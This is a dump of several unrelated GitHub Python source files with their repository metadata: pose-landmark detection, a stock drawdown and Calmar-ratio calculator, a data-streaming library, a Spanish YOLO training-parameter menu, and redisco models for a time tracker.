if self.results.pose_landmarks:
for id, lm in enumerate(self.results.pose_landmarks.landmark):
h, w, c = img.shape
# print(id, lm)
cx, cy = int(lm.x*w), int(lm.y*h)
self.lmList.append([id, cx, cy])
if draw:
cv2.circle(img, (cx, cy), 5, (255, 0, 0), cv2.FILLED)
return(self.lmList)
def findAngle(self, img, p1, p2, p3, draw = True):
#Get the landmarks
x1, y1 = self.lmList[p1][1:]
x2, y2 = self.lmList[p2][1:]
x3, y3 = self.lmList[p3][1:]
# Calculate the Angle
angle = math.degrees(math.atan2(y3 - y2, x3 -x2) - math.atan2(y1-y2 , x1 -x2))
if angle < 0:
angle += 0
angle1 = angle
if angle > 299:
angle += -260
angle1 = angle
# print(angle)
#Draw
if draw:
cv2.line(img, (x1, y1), (x2, y2), (255,255,255), 3)
cv2.line(img, (x3, y3), (x2, y2), (255,255,255), 3)
cv2.circle(img, (x1, y1), 10, (255, 0, 0), cv2.FILLED)
cv2.circle(img, (x1, y1), 15, (255, 0, 0), 2)
cv2.circle(img, (x2, y2), 10, (255, 0, 0), cv2.FILLED)
cv2.circle(img, (x2, y2), 15, (255, 0, 0), 2)
cv2.circle(img, (x3, y3), 10, (255, 0, 0), cv2.FILLED)
cv2.circle(img, (x3, y3), 15, (255, 0, 0), 2)
cv2.putText(img, str(int(angle)), (x2 - 20, y2 +50), cv2.FONT_HERSHEY_PLAIN, 2.5, (0, 0, 255), 2 )
return angle
def main():
cap = cv2.VideoCapture('../Pose_Estimate/1.mp4')
pTime = 0
detector = poseDetector()
while True:
success, img = cap.read()
img = detector.findPose(img)
lmList = detector.findPosition(img)
# print(lmList)
cTime = time.time()
fps = 1/(cTime - pTime)
pTime = cTime
cv2.putText(img, str(int(fps)), (70 ,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0),3)
cv2.imshow("Image", img)
cv2.waitKey(10)
if __name__ == "__main__":
main() | [
"noreply@github.com"
] | watcharabulsak.noreply@github.com |
bfb478f20e11de16e5810f8d08fa62eb3da131f8 | f48a3d354bf4bbbe3d47651dd77853c29934f1fe | /Code/Finance/Code/Udemy_AlgoTrading/51_max_dd_calmar.py | 0639e3adacef6a05456f219fb7c4fdc80ad8f7fa | [
"MIT"
] | permissive | guidefreitas/TeachingDataScience | 0677df459d5a13c00404b8b04cbe3b389dae3d8b | f3e0bc6e391348a8065b09855ab82c436f82a4b5 | refs/heads/master | 2023-09-03T14:02:11.853103 | 2021-11-07T03:56:54 | 2021-11-07T03:56:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,457 | py | # =============================================================================
# Measuring the performance of a buy and hold strategy - Max drawdown & calmar ratio
# Author : Mayank Rasu (http://rasuquant.com/wp/)
# Please report bug/issues in the Q&A section
# =============================================================================
# Import necesary libraries
import yfinance as yf
import numpy as np
import datetime as dt
# Download historical data for required stocks
ticker = "^GSPC"
SnP = yf.download(ticker,dt.date.today()-dt.timedelta(1825),dt.datetime.today())
def CAGR(DF):
"function to calculate the Cumulative Annual Growth Rate of a trading strategy"
df = DF.copy()
df["daily_ret"] = DF["Adj Close"].pct_change()
df["cum_return"] = (1 + df["daily_ret"]).cumprod()
n = len(df)/252
CAGR = (df["cum_return"][-1])**(1/n) - 1
return CAGR
def max_dd(DF):
"function to calculate max drawdown"
df = DF.copy()
df["daily_ret"] = DF["Adj Close"].pct_change()
df["cum_return"] = (1 + df["daily_ret"]).cumprod()
df["cum_roll_max"] = df["cum_return"].cummax()
df["drawdown"] = df["cum_roll_max"] - df["cum_return"]
df["drawdown_pct"] = df["drawdown"]/df["cum_roll_max"]
max_dd = df["drawdown_pct"].max()
return max_dd
print(max_dd(SnP))
def calmar(DF):
"function to calculate calmar ratio"
df = DF.copy()
clmr = CAGR(df)/max_dd(df)
return clmr
print(calmar(SnP))
| [
"yogeshkulkarni@yahoo.com"
] | yogeshkulkarni@yahoo.com |
6c27f3d07face576d697b2fba1c8919de5ac65a9 | 691d3080caa8eb6bc1012fc2843e6d190b61d10a | /data/stream.py | 9fae470abafeb34e339aab6e625bd7c73bc9427d | [] | no_license | grahamas/generative_motion | 82b78c0348255e2576ead0ab789583c93aaff15f | a490b4da24106eb356168fc05070bd482117ebb1 | refs/heads/master | 2021-03-22T03:45:33.950777 | 2016-06-02T02:48:00 | 2016-06-02T02:48:00 | 51,705,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,225 | py | import os,sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from future_builtins import zip
from abc import ABCMeta, abstractmethod
import random
from util.circ_array import CircularArray
import numpy as np
# Less than a week after writing this (well, I finished today)
# I have the sneaking feeling that generator expressions have the
# same effect.
class Stream(object):
"""
Streams data
Does not hold data; IS NOT ITERATOR.
Does iterate.
"""
def __init__(self, source, max_len=None,
skip_len=0, on_load=[]):
"""
source : stream's source (typically another stream)
max_len : (default=None) maximum number of stream units to load
skip_len : (default=0) the number of initial units to skip
on_load : (default=[]) list of processing functions to apply to
each unit when loaded
"""
self.source = source
self.max_len = max_len
self.skip_len = skip_len
self.on_load = on_load
self.skip_n(self.skip_len)
self.i_unit = 0
def write(self, file_name, mode, on_write=[]):
with open(file_name, mode) as out_file:
unit = self.next()
while unit is not None:
out_file.write(reduce(lambda x,f: f(x), on_write, unit))
unit = self.next()
def next(self):
"""
Returns next unit.
"""
if (not self.max_len) or self.i_unit < self.max_len:
try:
self.i_unit += 1 # Probably bad idea, since StopIteration could be sent,
# but i_unit would continue incrementing.
return reduce(lambda x,f: f(x) if x is not None else None, self.on_load, self.source.next())
except StopIteration:
return None
else:
return None
def skip(self):
if isinstance(self.source, Stream):
self.source.skip()
else:
self.source.next()
def batch(self, batch_size, stride=None, max_len=None,
skip_len=0, on_load=[]):
"""
Returns stream whose units are batches.
"""
return BatchStream(self, batch_size, stride=stride,
max_len=max_len, skip_len=skip_len, on_load=on_load)
def map(self, functions, arr=None, stride=None,
max_len=None, skip_len=0):
"""
Returns stream whose units are map output.
"""
if isinstance(functions, list):
return Stream(self, max_len=max_len,
skip_len=skip_len, on_load=functions)
else:
return Stream(self, max_len=max_len,
skip_len=skip_len, on_load=[functions])
def reduce(self, function, init_value=None):
"""
Returns output of reduction.
"""
if init_value:
left = init_value
else:
left = self.next()
right = self.next()
while right is not None:
left = function(left, right)
right = self.next()
return left
def next_n(self, n):
return [self.next() for i in range(n)]
def skip_n(self,n):
"""
Skips ahead n units, sending logic down the line.
"""
if isinstance(self.source, Stream):
self.source.skip_n(n)
else:
for i in range(n):
self.source.next()
def to_list(self):
ret_list = []
next_unit = self.next()
while next_unit is not None:
ret_list += [next_unit]
next_unit = self.next()
return ret_list
class StreamCollection(object):
"""
A collection of streams. We assume we start with the sources.
"""
def __init__(self, stream_collection, on_load=[]):
self.stream_collection = stream_collection
def __len__(self):
return len(self.stream_collection)
def next(self):
return [reduce(lambda x,f: f(x), self.on_load, stream) for stream in self.stream_collection.next()]
def skip(self):
self.stream_collection.skip()
def next_n(self, n):
"""
Gets list of lists of next n from each stream,
and applies on_load functions to each unit.
Necessary implmentation for batching.
"""
return [[reduce(lambda x,f: f(x), self.on_load, unit) for unit in stream_n_units]
for stream_n_units in self.stream_collection.next()]
def skip_n(self):
self.stream_collection.skip_n()
def batch(self, batch_size, stride=None, max_len=None,
skip_len=0, on_load=[]):
return
def map(self, functions, stride=None,
max_len=None, skip_len=0):
"""
Maps functions to all streams independently.
Works by returning a new StreamCollection with the
functions as the on_load in the new Collection,
and self as the source_collection of the returned
object.
Returns new StreamCollection.
"""
if isinstance(functions, list):
return StreamCollection(self, max_len=max_len,
skip_len=skip_len, on_load=functions)
else:
return StreamCollection(self, max_len=max_len,
skip_len=skip_len, on_load=[functions])
def reduce(self, function, init_values=None):
"""
Independently reduces all streams (folding from left, obviously).
Returns list of results.
"""
if init_values:
if isinstance(init_values, list):
lefts = init_values
else:
lefts = [init_values] * len(self.stream_collection)
else:
lefts = self.next()
rights = self.next()
while not all(rights is None):
valid = not rights is None
args = zip(lefts[valid], rights[valid])
lefts = map(lambda arg: function(*arg), args)
rights = self.next()
def join(self, function, max_len=None,
skip_len=0):
"""
Joins all streams in the collection into a single stream.
Takes a function that takes a list of units and returns
a unit (no necessary relation between in and out units).
Returns new Stream.
"""
return Stream(self, on_load=[function])
class BatchStream(Stream):
def __init__(self, source, batch_size,
stride=None,
max_len=None,
skip_len=0, on_load=[]):
# Notice that super call MUST follow self.next assignment,
# in case skip function is called. (??? No that's wrong)
if stride and not stride == batch_size:
assert stride < batch_size and stride > 0
self.stride = stride
self.next = self.uninitialized_next
else:
self.next = self.simple_next
super(BatchStream, self).__init__(source, max_len, skip_len, on_load)
self.batch_size = batch_size
def uninitialized_next(self):
"""
Initializes the on_hand buffer, and returns the first batch.
"""
self.circ_array = CircularArray(self.source.next_n(self.batch_size))
self.next = self.initialized_next
return self.apply(self.circ_array.get())
def initialized_next(self):
"""
Now that the buffer has been initialized, just gets next
stride's worth of units from source. Uses effectively circular
array for storage.
"""
self.circ_array.append(self.source.next_n(self.stride))
return self.apply(self.circ_array.get())
def simple_next(self):
"""
In the case that the batches don't overlap.
"""
return self.apply(self.source.next_n(self.batch_size))
def apply(self, retval):
"""
A helper function to apply on_load and check for None value.
Possibly unnecessary, but eliminates code repetition.
"""
if retval is None:
return None
retval = reduce(lambda x, f: f(x), self.on_load, retval)
if not any(val is None for val in retval):
return retval
else:
return None
class BatchStreamCollection(StreamCollection):
def __init__(self, stream_collection, batch_size,
stride=None,
max_len=None,
skip_len=0, on_load=[]):
if stride and not stride == batch_size:
assert stride < batch_size and stride > 0
self.stride = stride
self.next = self.uninitialized_next
else:
self.next = self.simple
super(BatchStreamCollection, self).__init__(stream_collection, max_len, skip_len, on_load)
self.batch_size = batch_size
def uninitialized_next(self):
self.l_circ_array = [CircularArray(source.next_n(self.batch_size)) for source in self.stream_collection]
self.next = self.initialized_next
return [reduce(lambda x,f: f(x), self.on_load, ca.get()) for ca in self.l_circ_array]
def initialized_next(self):
(ca.append(source.next_n(self.stride)) for ca,source in zip(self.l_circ_array,self.stream_collection))
return [reduce(lambda x,f: f(x), self.on_load, ca.get()) for ca in self.l_circ_array]
def simple_next(self):
return [reduce(lambda x,f: f(x), self.on_load, source.next_n(batch_size)) for source in self.stream_collection]
class FileStream(Stream):
"""
Abstract class for implementing base stream from a file
Needs to be abstract as the method of file opening is different.
In implementing, subclass FileSource in a class defined in the __enter__
method. This subclass should define all the low level methods of interacting
with the file. Then the __enter__ method returns an instance of the FileSource
subclass, and the __exit__ method cleans up.
"""
__metaclass__ = ABCMeta
def __init__(self, file_path, max_len=None,
skip_len=0, on_load=[]):
"""
file_path : path to data file
max_len : (default=None) maximum number of stream units to load
skip_len : (default=0) the number of initial units to skip
on_load : (default=[]) list of processing functions to apply to
each unit when loaded
"""
self.file_path = file_path
super(FileStream, self).__init__(None, max_len,
skip_len, on_load)
@abstractmethod
def __enter__(self):
pass
@abstractmethod
def __exit__(self):
pass
class FileStreamCollection(StreamCollection):
"""
Collection of FileStreams
Implements "with" logic (returns list of opened sources)
"""
def __len__(self):
return len(self.sources)
def next(self):
return [reduce(lambda x,f: f(x), self.on_load, stream) for stream in self.streams]
def skip(self):
pass
# TODO
#def map(self, functions
def __enter__(self):
self.sources = [stream.__enter__() for stream in self.streams]
return self.sources
def __exit__(self):
[source.__exit__() for source in self.sources]
class FileSource(object):
"""
Abstract class for implementing lowest level interaction with file.
For safety, this class should only be instantiated within a "with"
block, so all subclass definitions should appear in the __enter__
method of a subclass of the FileStream class.
"""
__metaclass__ = ABCMeta
@abstractmethod
def next(self):
pass
def next_n(self,n):
"Naive implementation, for convenience."
return [self.next() for i in range(n)]
@abstractmethod
def skip(self):
pass
def skip_n(self,n):
"Naive implementation, for convenience."
for i in range(n):
self.skip()
@abstractmethod
def close_file(self):
pass
| [
"grahamas@gmail.com"
] | grahamas@gmail.com |
56a996d6c220db976dbe6c426c9c67b3026bf224 | 846109568e3f4d805d6d39b9adbe32032775db93 | /ayuda.py | 3168d288a182102d83ec308c8c238430c5594ffe | [] | no_license | sergiocoteronPI/carPlatesDetection | aacdc5038b782aef5d4d720eedcb6d676bc0695e | cf9378b105a4515fd3bb653b9de0bf63c8388897 | refs/heads/master | 2020-11-28T04:35:03.445684 | 2020-01-14T12:24:31 | 2020-01-14T12:24:31 | 229,704,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,801 | py |
import numpy as np
import cv2
import os
import sys
""" ===================================
Subprograma auxiliar para eliminar los
elementos que haya en una ruta dada
=================================== """
def eliminar_elementos(ruta):
lista_elementos = []
for ruta, _, ficheros in os.walk(ruta):
for nombre_fichero in ficheros:
rut_comp = os.path.join(ruta, nombre_fichero)
lista_elementos.append(rut_comp)
for eliminando in lista_elementos:
os.remove(eliminando)
""" =============================================================================================================================================================
Colocamos aquí la lista de parámetros que no varian a lo
largo de todo el programa y que todos los subprogramas
podran utilizar.
*** Lista ***
0 - ent_numb_max -> Numero de veces que ejecutaremos el entrenamiento a lo sumo.
1 - paso_maximo -> Es el número de pasos que un lote puede entrenar antes de ser sustituido por otro lote.
2 - perdida_minima -> Es la cantidad mínima que la función pérdida (f_p) puede tener. Si f_p < perdida_minima entonces cambiamos de lote.
3 - dim -> Es la dimensión de las imágenes con la que estamos tratando. Es difícil que este parámetro cambie.
4 - batch_size -> Tamaño que cada lote va a tener. Si tenemos una base de datos de tamaño n y batch_size = b_s entonces numero_de_lotes = [n/b_s].
5 - batch_size_test -> Tamaño del lote para el test.
6 - cada_pasito -> Variable entera que establece cada cuantos pasos (step) mostraremos el resultado de f_p, guardaremos datos y podremos optar a ver img_finales
7 - quiero_ver -> Variable de control booleana. Permite decirnos si queremos ver o no el resultado de los entrenamientos cada_pasito.
8 - learning_ratio -> Redio de aprendizaje. Es el número que regula el cambio de los pesos y sesgos de las capas convolucionales.
9 - threshold -> Nivel de precisión que ha de tener una predicción para crear una caja.
10 - labels -> Nombre de las posibles etiquetas.
11 - anchors -> Valores predeterminados para predicciones de cajas.
12 - H, W, S, C, B -> salida.shape[1], salida.shape[2], salida.shape[1 (o 2 que son iguales)], numero de clases, numero de cajas de predicción.
13 - sqrt -> Vete a saber tu para que sirve esto.
14 - n_final_layers -> Numero final de capas que ha de tener la salida.
============================================================================================================================================================= """
def prog_change_datos(ent_numb_max,paso_maximo,precision_min,dim_fil,dim_col,batch_size,batch_size_test,cada_pasito,quiero_ver,salvando,
preprocesamiento,learning_ratio,threshold,labels,anchors,H, W, C, B):
print('')
print(' ===== PROGRAMA DE ENTRENAMIENTO =====')
print(' ===== ------------------------- =====')
print('')
print(' ---> Red neuronal basada en YOLO <---')
print('')
print(' *** PARAMETROS DE LA RED NEURONAL ***')
print(' ===== ------------------------- =====')
print('')
print(' 1 - Numero maximo de entrenamientos a ejecutar ----------> ', ent_numb_max)
print(' 2 - Paso maximo -----------------------------------------> ', paso_maximo)
print(' 3 - Precision minima ------------------------------------> ', precision_min)
print('')
print(' 4 - Dimension de las imagenes ---------------------------> ', dim_fil, ' - ', dim_col)
print('')
print(' 5 - Tamaño del lote de entrenamiento --------------------> ', batch_size)
print(' 6 - Tamaño del lote de testeo ---------------------------> ', batch_size_test)
print('')
print(' 7 - Numero de pasos para mostrar perdida y guardar ------> ', cada_pasito)
print(' 8 - Guardar imagenes de salida en "imagenes_devueltas" --> ', quiero_ver)
print(' 9 - Guardar entrenamiento -------------------------------> ', salvando)
print('')
print(' 10 - Preprocesamiento -----------------------------------> ', preprocesamiento)
print(' 11 - Radio de aprendizaje -------------------------------> ', learning_ratio)
print('')
print(' =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*==*=*=*=*=*=*=*=*=*=*=*=*=*=*=')
print('')
print(' 12 - Limite de precision aceptable ----------------------> ', threshold)
print(' 13 - Etiquetas ------------------------------------------> ', labels)
print(' 14 - Anclas (rectangulos predeterminados) ---------------> ', anchors)
print('')
print(' 15 - H, W, S, C, B, sqrt --------------------------------> ', H, W, C, B)
print('')
scarlet = input('Estos son los parametros de la red. Está de acuerdo con ellos (s/n): ')
l_p_scarlet = ['s', 'S', 'Y', 'y', 'si', 'Si', 'SI', 'sI', 'Yes', 'yes', 'YES', 'n', 'N', 'No', 'NO']
while scarlet not in l_p_scarlet:
print('')
print('Introduzca correctamente la respuesta.')
scarlet = input('Estos son los parametros de la red. Está de acuerdo con ellos (s/n): ')
if scarlet in ['n', 'N', 'No', 'NO']:
print('')
print(' ATENCION. EL CAMBIO DE VALORES DE LA RED TRAE CONSECUENCIAS QUE ALTERARAN EL RESULTADO DE LA SALIDA')
print('')
de_acuerdo = 5
while de_acuerdo not in ['s', 'S', 'Y', 'y', 'si', 'Si', 'SI', 'sI', 'Yes', 'yes', 'YES']:
johansson = input('Introduzca el nombre del parametro de la lista que desea cambiar: ')
lista_de_parametros = ['1','2','3','4','5','6','7','8','9','10','11','12','13','14', '15']
while johansson not in lista_de_parametros:
print('')
print('Introduce bien las cosas. No es tan dificil. Un numero del 1 al 15.')
johansson = input('Introduzca el nombre del parametro de la lista que desea cambiar: ')
if johansson == '1':
print('')
print('Vas a cambiar el numero de entrenamiento maximos. Su valor actual es: ', ent_numb_max)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
ent_numb_max = int(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '2':
print('')
print('Vas a cambiar el numero de pasos maximos. Su valor actual es: ', paso_maximo)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
paso_maximo = int(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '3':
print('')
print('Vas a cambiar la precision minima. Su valor actual es: ', precision_min)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
precision_min = float(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '4':
print('')
print('Vas a cambiar la imension de las imagenes (NO RECOMENDADO). Su valor actual es: ', dim_fil, ' - ', dim_col)
nuevo_valor_fil = input('Introduce un nuevo valor de dim_fil: ')
nuevo_valor_col = input('Introduce un nuevo valor de dim_col: ')
try:
dim_fil, dim_col = int(nuevo_valor_fil), int(nuevo_valor_col)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '5':
print('')
print('Vas a cambiar el tamano del lote. Su valor actual es: ', batch_size)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
batch_size = int(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '6':
print('')
print('Vas a cambiar el numero de elementos para testear. Su valor actual es: ', batch_size_test)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
batch_size_test = int(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '7':
print('')
print('Vas a cambiar el numero de pasos para mostrar perdida y guardar parametro e imagenes. Su valor actual es: ', cada_pasito)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
cada_pasito = int(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '8':
print('')
print('Vas a cambiar la opcion para ver las imagenes en carpeta. Su valor actual es: ', quiero_ver)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
quiero_ver = nuevo_valor
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '9':
print('')
print('Vas a cambiar la opcion para salvar. Su valor actual es: ', salvando)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
salvando = nuevo_valor
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '10':
print('')
print('Vas a cambiar el preprocesamiento de imagenes. Su valor actual es: ', preprocesamiento)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
preprocesamiento = nuevo_valor
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '11':
print('')
print('Vas a cambiar el radio de aprendizaje. Su valor actual es: ', learning_ratio)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
learning_ratio = float(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '12':
print('')
print('Vas a cambiar el limite de precision. Su valor actual es: ', threshold)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
threshold = float(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '13':
print('')
print('Vas a cambiar elas etiquetas. Su valor actual es: ', labels)
nuevo_valor = input('Introduce un nuevo valor (ej: a b c): ')
try:
labels = nuevo_valor.split(' ')
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '14':
print('')
print('Vas a cambiar las anclas (NO RECOMENDADO). Su valor actual es: ', anchors)
nuevo_valor = input('Introduce un nuevo valor (ej: 1 2 3 4 5): ')
try:
anchors_2 = nuevo_valor.split(', ')
anchors = []
for avc in anchors_2:
anchors.append(float(avc))
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '15':
print('')
print('Vas a cambiar alguno de los valores H, W, C, B.')
megan = input('Cual de ellos: ')
if megan in ['H', 'W', 'C', 'B']:
if megan == 'H':
print('')
try:
H = int(input('Introduce un nuevo valor: '))
except:
print('')
print('La has cagado. Adios.')
sys.exit()
if megan == 'W':
print('')
try:
W = int(input('Introduce un nuevo valor: '))
except:
print('')
print('La has cagado. Adios.')
sys.exit()
if megan == 'C':
print('')
try:
C == int(input('Introduce un nuevo valor: '))
except:
print('')
print('La has cagado. Adios.')
sys.exit()
if megan == 'B':
print('')
try:
B = int(input('Introduce un nuevo valor: '))
except:
print('')
print('La has cagado. Adios.')
sys.exit()
else:
print('')
print('La has cagado. Adios.')
sys.exit()
print('')
print(' ===== PROGRAMA DE ENTRENAMIENTO =====')
print(' ===== ------------------------- =====')
print('')
print(' ---> Red neuronal basada en YOLO <---')
print('')
print(' *** PARAMETROS DE LA RED NEURONAL ***')
print(' ===== ------------------------- =====')
print('')
print(' 1 - Numero maximo de entrenamientos a ejecutar ----------> ', ent_numb_max)
print(' 2 - Paso maximo -----------------------------------------> ', paso_maximo)
print(' 3 - Precision minima ------------------------------------> ', precision_min)
print('')
print(' 4 - Dimension de las imagenes ---------------------------> ', dim_fil, ' - ', dim_col)
print('')
print(' 5 - Tamaño del lote de entrenamiento --------------------> ', batch_size)
print(' 6 - Tamaño del lote de testeo ---------------------------> ', batch_size_test)
print('')
print(' 7 - Numero de pasos para mostrar perdida y guardar ------> ', cada_pasito)
print(' 8 - Guardar imagenes de salida en "imagenes_devueltas" --> ', quiero_ver)
print(' 9 - Guardar entrenamiento -------------------------------> ', salvando)
print('')
print(' 10 - Preprocesamiento -----------------------------------> ', preprocesamiento)
print(' 11 - Radio de aprendizaje -------------------------------> ', learning_ratio)
print('')
print(' =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*==*=*=*=*=*=*=*=*=*=*=*=*=*=*=')
print('')
print(' 12 - Limite de precision aceptable ----------------------> ', threshold)
print(' 13 - Etiquetas ------------------------------------------> ')#, labels)
print(' 14 - Anclas (rectangulos predeterminados) ---------------> ', anchors)
print('')
print(' 15 - H, W, S, C, B, sqrt --------------------------------> ', H, W, C, B)
print('')
de_acuerdo = input('Estos son los parametros de la red. Está de acuerdo con ellos (s/n): ')
print('')
print('Perfecto, alla vamooooos.')
else:
print('')
print('Perfecto, continuemos.')
return ent_numb_max,paso_maximo,precision_min,dim_fil,dim_col,batch_size,batch_size_test,cada_pasito,quiero_ver,salvando,preprocesamiento,learning_ratio,threshold,labels,anchors,H, W, C, B
def desordenar(nombrecitos_bonitos):
longi = len(nombrecitos_bonitos)
lista_aleatoria = np.random.randint(0, longi, (longi))
if longi != 1:
for lana in range(int(longi/2)):
num1 = lista_aleatoria[2*lana]
num2 = lista_aleatoria[2*lana + 1]
aux = nombrecitos_bonitos[num1]
nombrecitos_bonitos[num1] = nombrecitos_bonitos[num2]
nombrecitos_bonitos[num2] = aux
return nombrecitos_bonitos
def desordenar_todo(nombrecitos_bonitos):
longi = len(nombrecitos_bonitos)
lista_aleatoria = np.random.randint(0, longi, (longi))
if longi != 1:
for lana in range(int(longi/2)):
num1 = lista_aleatoria[2*lana]
num2 = lista_aleatoria[2*lana + 1]
aux = nombrecitos_bonitos[num1]
nombrecitos_bonitos[num1] = nombrecitos_bonitos[num2]
nombrecitos_bonitos[num2] = aux
return nombrecitos_bonitos
""" ===================================
Este programa carga el lote. Nosotros
le damos los nombres de los archivos
.txt y el nos devuelve la imagen una
vez realizadas algunas transformaciones
aparte de los array probabilidad,
coordenada, area...
=================================== """
| [
"noreply@github.com"
] | sergiocoteronPI.noreply@github.com |
a504243b512c9026ea67e088ce224c687a2ef2d0 | 105bd35304dd1d831bcb89f42120af1ec87065ae | /tempCodeRunnerFile.py | cef0a82d926221f858eaab066203cf5371154ac7 | [] | no_license | ayush-105192219/python-test-code | 3dd861e197cd326fc0e7c642a5fd3a00fe12408e | 053de4841e338e631e7d386275c4e40ee9f8e21e | refs/heads/master | 2023-05-31T10:57:35.015286 | 2021-07-01T07:48:58 | 2021-07-01T07:48:58 | 381,952,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py |
print (( 20 + 1.1)) #output:21.1 | [
"mynameayush100@gmail.com"
] | mynameayush100@gmail.com |
34c324f9bfe464ec5dec8508c846a30409c79e34 | 46c521a85f567c609f8a073cb9569ea59e2a104f | /kunalProgram23.py | bab9fcf53fa8ff6e595f560e1fd900d0d4fa40d5 | [] | no_license | Kunal352000/python_adv | c046b6b785b52eaaf8d089988d4dadf0a25fa8cb | d9736b6377ae2d486854f93906a6bf5bc4e45a98 | refs/heads/main | 2023-07-15T23:48:27.131948 | 2021-08-21T13:16:42 | 2021-08-21T13:16:42 | 398,557,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | n=int(input("Enter number of rows: "))
for i in range(n):
print(" "*(n-1-i)+(str(i+1)+' ')*(i+1))
for i in range(n-1):
print(" "*(i+1)+(str(n-1-i)+' ')*(n-1-i))
| [
"noreply@github.com"
] | Kunal352000.noreply@github.com |
108ee0f25ca41a2dd1d82011514133e044d940a3 | 583dcbcbad658fa7b9f297202523e1a165da342f | /models.py | 52646339ac58a102d71b1cef84eeecd146ed21d2 | [] | no_license | csdurfee/more_time | 01e482ff29a871f63b6f808b4b18b4fd9d6ebc61 | 982f1615570de91547bff6108e63aca50a117d29 | refs/heads/master | 2020-04-05T23:08:38.842854 | 2012-01-01T21:38:23 | 2012-01-01T21:38:23 | 2,814,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,000 | py | from redisco import models
#from werkzeug import generate_password_hash, check_password_hash
import werkzeug
DEFAULT_PROJECT_NAME = "Junk Drawer"
DEFAULT_TASK_NAME = "My Task"
class StaticPage(models.Model):
title = models.Attribute(required=True)
text = models.Attribute(indexed=False)
class UnitOfWork(models.Model):
note = models.Attribute()
start_time = models.IntegerField()
end_time = models.IntegerField()
task = models.ReferenceField("Task")
def elapsed(self):
if not self.end_time:
return 0
return self.end_time - self.start_time
def __unicode__(self):
return "%s -- %s -- %s -- %s" % (self.task, self.note,
self.start_time, self.end_time)
class Task(models.Model):
name = models.Attribute(default=DEFAULT_TASK_NAME)
units_of_work = models.ListField(UnitOfWork)
project = models.ReferenceField('Project')
active = models.BooleanField(default=False)
def elasped(self):
_all_times = [x.elapsed() for x in self.units_of_work]
return sum(_all_times)
def __unicode__(self):
return unicode(self.name)
class Project(models.Model):
name = models.Attribute(default=DEFAULT_PROJECT_NAME)
tasks = models.ListField(Task)
active = models.BooleanField(default=False)
def num_tasks(self):
return len(self.tasks)
def __unicode__(self):
return unicode(self.name)
#@YAGNI
"""
class UserSpace(models.Model):
users = models.ListField(User)
name = models.Attribute(required=True)
"""
class User(models.Model):
user_name = models.Attribute(required=True)
real_name = models.Attribute()
pwdhash = models.Attribute(required=True)
active = models.BooleanField(default=True)
email = models.Attribute()
paid = models.BooleanField(default=False)
#profile = models.ReferenceField('UserProfile')
projects = models.ListField(Project)
created = models.DateTimeField(auto_now_add=True)
def check_password(self, password):
return werkzeug.check_password_hash(self.pwdhash, password)
@staticmethod
def create_user(user_name, password, email):
"""redisco doesn't allow you to override the constructor, hence
the rather ugly staticmethod"""
u = User(user_name=user_name, email=email)
u.pwdhash = werkzeug.generate_password_hash(password)
return u
# TODO: put this in a separate managers.py file.
class UserManager(object):
"""junk-drawer class. ugh."""
@staticmethod
def get_for_timer(session, request):
"""
returns an anonymous user, new if necessary,
and the task that is active
returns (user, active project, active task)
"""
"""if 'username' in session:
user = User.objects.get_or_create(user_name = escape(session['username']))
else:
pass
"""
user_name = session.get('user_name', 'casey')
user = User.objects.get_or_create(user_name = user_name)
# TODO: get passed in project, not default to active
active_project = UserManager._getOrCreateActiveProject(user)
active_task = UserManager._getOrCreateActiveTask(active_project)
return (user, active_project, active_task,)
@staticmethod
def _getOrCreateActiveProject(user):
"""returns a default, "unclassified" project called Junk Drawer if there
are no projects, or one isn't active.
TODO: add last accessed timestamp attr here.
"""
active_project = None
first_project = None
for p in user.projects:
if not first_project:
first_project = p
if p.active:
active_project = p
break
if not active_project:
if first_project:
active_project = first_project
active_project.active = True
active_project.save()
else:
active_project = Project(active=True)
active_project.save()
user.projects.append(active_project)
user.save()
return active_project
@staticmethod
def _getOrCreateActiveTask(project):
active_task = None
first_task = None
for t in project.tasks:
if not first_task:
first_task = t
if t.active:
active_task = t
break
if not active_task:
if first_task:
active_task = first_task
active_task.active = True
active_task.save()
else:
active_task = Task(active=True)
active_task.save()
project.tasks.append(active_task)
project.save()
